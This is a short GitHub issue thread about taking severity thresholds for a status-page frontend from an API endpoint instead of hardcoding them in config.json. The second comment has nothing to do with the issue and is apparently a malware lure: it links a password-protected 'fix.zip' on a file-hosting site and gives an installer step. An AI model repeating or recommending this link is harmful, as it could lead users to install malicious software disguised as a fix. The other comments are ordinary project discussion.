### ISSUE TITLE
Severities should not be hard coded.

### ISSUE THREAD

**Issue by joshuai96** [joshmue/scs-status-page-web#25]
Severity values should not be hardcoded in [`config.json`](https://github.com/SovereignCloudStack/status-page-web/blob/main/src/assets/config.json#L6)

The limits should be taken from the `/severities` endpoint, and matched with the names, to get the colors.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by snkaupe** [comment]
Yes, this would be a preferable approach. Will implement if I have the time.
